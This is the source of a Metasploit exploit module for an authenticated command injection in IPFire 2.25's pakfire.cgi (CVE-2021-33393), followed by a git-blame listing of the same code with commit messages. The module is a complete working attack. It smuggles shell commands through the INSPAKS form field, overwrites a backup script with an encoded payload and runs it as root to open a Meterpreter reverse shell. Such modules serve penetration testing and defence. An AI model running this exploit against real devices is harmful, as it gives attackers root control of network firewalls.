modules/exploits/linux/http/ipfire_pakfire_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE',
        'Description' => %q{
          This module exploits an authenticated command injection vulnerability in the
          /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156
          and prior to execute arbitrary code as the root user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Mücahit Saratar <trregen222@gmail.com>', # vulnerability research & exploit development
          'Grant Willcox' # Module enhancements and documentation fixes.
        ],
        'References' => [
          [ 'EDB', '49869' ],
          [ 'CVE', '2021-33393'],
          [ 'URL', 'https://github.com/MucahitSaratar/ipfire-2-25-auth-rce'],
          [ 'URL', 'https://www.youtube.com/watch?v=5FUXV7dfNjg'],
        ],
        'Platform' => ['python' ],
        'Privileged' => true,
        'Arch' => [ ARCH_PYTHON ],
        'Targets' => [
          [
            'Python Dropper',
            {
              'Platform' => 'python',
              'Arch' => [ ARCH_PYTHON ],
              'Type' => :unix_memory,
              'DefaultOptions' => {
                'PAYLOAD' => 'python/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DisclosureDate' => '2021-05-17',
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ CONFIG_CHANGES, IOC_IN_LOGS ]
        },
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        Opt::RPORT(444),
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ true, 'Password to login with', '']),
      ]
    )
  end

  def vpath
    '/cgi-bin/pakfire.cgi' # vulnerable path
  end

  def send_packet(method, execstr, waitsec)
    myheaders = {
      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/"
    }
    if method == 'GET'
      response = send_request_cgi(
        'uri' => vpath,
        'headers' => myheaders,
        'SSL' => true,
        'timeout' => waitsec
      )
    else
      response = send_request_cgi(
        'uri' => vpath,
        'headers' => myheaders,
        'SSL' => true,
        'method' => 'POST',
        'vars_post' => {
          'INSPAKS' => ";#{execstr}",
          'ACTION' => 'install',
          'x' => Rex::Text.rand_text_numeric(2),
          'y' => Rex::Text.rand_text_numeric(2)
        },
        'timeout' => waitsec
      )
    end
    response
  end

  def check
    cevap = send_packet('GET', '', 10)
    if cevap.nil? || cevap.body.empty?
      return CheckCode::Unknown('No response from the target!')
    end

    unless cevap.body.scan(/401 Unauthorized/).empty?
      return CheckCode::Unknown('Invalid credentials supplied! Check USERNAME and PASSWORD options!')
    end

    version = cevap.body.scan(/IPFire (.*) \(.*\) - Core Update [0-9]{3}/).flatten[0] || ''
    core = cevap.body.scan(/IPFire .* \(.*\) - Core Update (.*)/).flatten[0] || ''
    unless version
      return CheckCode::Safe('Target is not IPFire')
    end
    if core.to_i >= 157
      return CheckCode::Safe("Target is running IPFire #{version} (Core Update #{core})")
    end

    CheckCode::Appears("Target is running IPFire #{version} (Core Update #{core})")
  end

  def exploit
    temp_backup_file = Rex::Text.rand_text_alphanumeric(5, 30)
    print_status("Backing up backup.pl to /tmp/#{temp_backup_file}...")
    if send_packet('POST', "cp /var/ipfire/backup/bin/backup.pl /tmp/#{temp_backup_file}", 1).nil?
      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to back up backup.pl!")
    end

    print_status('Overwriting the contents of backup.pl with a Python header statement')
    if send_packet('POST', 'echo "#!/usr/bin/python" > /var/ipfire/backup/bin/backup.pl', 1).nil?
      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to overwrite backup.pl!")
    end

    print_status('Appending the contents of backup.pl with the Python code to be executed.')
    if send_packet('POST', "echo \"#{payload.encoded}\" >> /var/ipfire/backup/bin/backup.pl", 1).nil?
      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to append to backup.pl!")
    end

    print_status('Executing /usr/local/bin/backupctrl to run the payload')
    unless send_packet('POST', '/usr/local/bin/backupctrl', 1).nil?
      fail_with(Failure::UnexpectedReply, 'Something went wrong, the server should not respond after we execute the payload.')
    end

    print_good('You should now have your shell, restoring the original contents of the backup.pl file...')
    if send_packet('POST', "cp /tmp/#{temp_backup_file} /var/ipfire/backup/bin/backup.pl", 20).nil?
      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to restore backup.pl!")
    end

    print_status('All done, enjoy the shells!')
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`
added cve 2021-06-10 02:31:42 +03:00			`Rank = ExcellentRanking`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00
			`include Msf::Exploit::Remote::HttpClient`
added cve 2021-06-10 02:31:42 +03:00			`include Msf::Exploit::CmdStager`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`prepend Msf::Exploit::Remote::AutoCheck`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00
			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
Adjust exploit module title for rubocop compliance 2021-06-10 16:54:35 -05:00			`'Name' => 'IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE',`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`'Description' => %q{`
Add more fixes to the module and documentation 2021-06-04 14:33:38 +03:00			`This module exploits an authenticated command injection vulnerability in the`
			`/cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156`
			`and prior to execute arbitrary code as the root user.`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`},`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`'License' => MSF_LICENSE,`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Author' => [`
			`'Mücahit Saratar <trregen222@gmail.com>', # vulnerability research & exploit development`
			`'Grant Willcox' # Module enhancements and documentation fixes.`
			`],`
			`'References' => [`
			`[ 'EDB', '49869' ],`
			`[ 'CVE', '2021-33393'],`
			`[ 'URL', 'https://github.com/MucahitSaratar/ipfire-2-25-auth-rce'],`
			`[ 'URL', 'https://www.youtube.com/watch?v=5FUXV7dfNjg'],`
			`],`
added cve 2021-06-10 02:31:42 +03:00			`'Platform' => ['python' ],`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`'Privileged' => true,`
added cve 2021-06-10 02:31:42 +03:00			`'Arch' => [ ARCH_PYTHON ],`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Targets' => [`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`[`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Python Dropper',`
			`{`
			`'Platform' => 'python',`
			`'Arch' => [ ARCH_PYTHON ],`
			`'Type' => :unix_memory,`
			`'DefaultOptions' => {`
			`'PAYLOAD' => 'python/meterpreter/reverse_tcp'`
added cve 2021-06-10 02:31:42 +03:00			`}`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`}`
			`]`
			`],`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`'DisclosureDate' => '2021-05-17',`
added cve 2021-06-10 02:31:42 +03:00			`'Notes' => {`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`'Reliability' => [ REPEATABLE_SESSION ],`
			`'Stability' => [ CRASH_SAFE ],`
			`'SideEffects' => [ CONFIG_CHANGES, IOC_IN_LOGS ]`
			`},`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`'DefaultTarget' => 0`
			`)`
			`)`
			`register_options(`
			`[`
			`Opt::RPORT(444),`
			`OptString.new('USERNAME', [ true, 'User to login with', 'admin']),`
adding backup 2021-05-27 18:27:38 +03:00			`OptString.new('PASSWORD', [ true, 'Password to login with', '']),`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`]`
			`)`
			`end`

			`def vpath`
			`'/cgi-bin/pakfire.cgi' # vulnerable path`
			`end`

added cve 2021-06-10 02:31:42 +03:00			`def send_packet(method, execstr, waitsec)`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`myheaders = {`
			`'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/"`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`}`
			`if method == 'GET'`
			`response = send_request_cgi(`
			`'uri' => vpath,`
			`'headers' => myheaders,`
			`'SSL' => true,`
			`'timeout' => waitsec`
			`)`
			`else`
			`response = send_request_cgi(`
			`'uri' => vpath,`
			`'headers' => myheaders,`
			`'SSL' => true,`
			`'method' => 'POST',`
			`'vars_post' => {`
Add more fixes to the module and documentation 2021-06-04 14:33:38 +03:00			`'INSPAKS' => ";#{execstr}",`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`'ACTION' => 'install',`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`'x' => Rex::Text.rand_text_numeric(2),`
			`'y' => Rex::Text.rand_text_numeric(2)`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`},`
			`'timeout' => waitsec`
			`)`
			`end`
added cve 2021-06-10 02:31:42 +03:00			`response`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`end`

			`def check`
added cve 2021-06-10 02:31:42 +03:00			`cevap = send_packet('GET', '', 10)`
Add more fixes to the module and documentation 2021-06-04 14:33:38 +03:00			`if cevap.nil? \|\| cevap.body.empty?`
			`return CheckCode::Unknown('No response from the target!')`
			`end`

added cve 2021-06-10 02:31:42 +03:00			`unless cevap.body.scan(/401 Unauthorized/).empty?`
			`return CheckCode::Unknown('Invalid credentials supplied! Check USERNAME and PASSWORD options!')`
			`end`

Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`version = cevap.body.scan(/IPFire (.) \(.\) - Core Update [0-9]{3}/).flatten[0] \|\| ''`
			`core = cevap.body.scan(/IPFire .* \(.\) - Core Update (.)/).flatten[0] \|\| ''`
			`unless version`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`return CheckCode::Safe('Target is not IPFire')`
			`end`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`if core.to_i >= 157`
			`return CheckCode::Safe("Target is running IPFire #{version} (Core Update #{core})")`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`end`

Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`CheckCode::Appears("Target is running IPFire #{version} (Core Update #{core})")`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`end`

			`def exploit`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`temp_backup_file = Rex::Text.rand_text_alphanumeric(5, 30)`
added cve 2021-06-10 02:31:42 +03:00			`print_status("Backing up backup.pl to /tmp/#{temp_backup_file}...")`
			`if send_packet('POST', "cp /var/ipfire/backup/bin/backup.pl /tmp/#{temp_backup_file}", 1).nil?`
			`fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to back up backup.pl!")`
			`end`
adding backup 2021-05-27 18:27:38 +03:00
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00			`print_status('Overwriting the contents of backup.pl with a Python header statement')`
added cve 2021-06-10 02:31:42 +03:00			`if send_packet('POST', 'echo "#!/usr/bin/python" > /var/ipfire/backup/bin/backup.pl', 1).nil?`
			`fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to overwrite backup.pl!")`
			`end`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00
Add more fixes to the module and documentation 2021-06-04 14:33:38 +03:00			`print_status('Appending the contents of backup.pl with the Python code to be executed.')`
added cve 2021-06-10 02:31:42 +03:00			`if send_packet('POST', "echo \"#{payload.encoded}\" >> /var/ipfire/backup/bin/backup.pl", 1).nil?`
			`fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to append to backup.pl!")`
			`end`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00
added cve 2021-06-10 02:31:42 +03:00			`print_status('Executing /usr/local/bin/backupctrl to run the payload')`
			`unless send_packet('POST', '/usr/local/bin/backupctrl', 1).nil?`
			`fail_with(Failure::UnexpectedReply, 'Something went wrong, the server should not respond after we execute the payload.')`
			`end`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00
added cve 2021-06-10 02:31:42 +03:00			`print_good('You should now have your shell, restoring the original contents of the backup.pl file...')`
			`if send_packet('POST', "cp /tmp/#{temp_backup_file} /var/ipfire/backup/bin/backup.pl", 20).nil?`
			`fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to restore backup.pl!")`
			`end`
Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-03 17:19:13 -05:00
			`print_status('All done, enjoy the shells!')`
ipfire 2.25 core 156 remote code execution 2021-05-22 19:47:37 +03:00			`rescue ::Rex::ConnectionError`
			`fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")`
			`end`
			`end`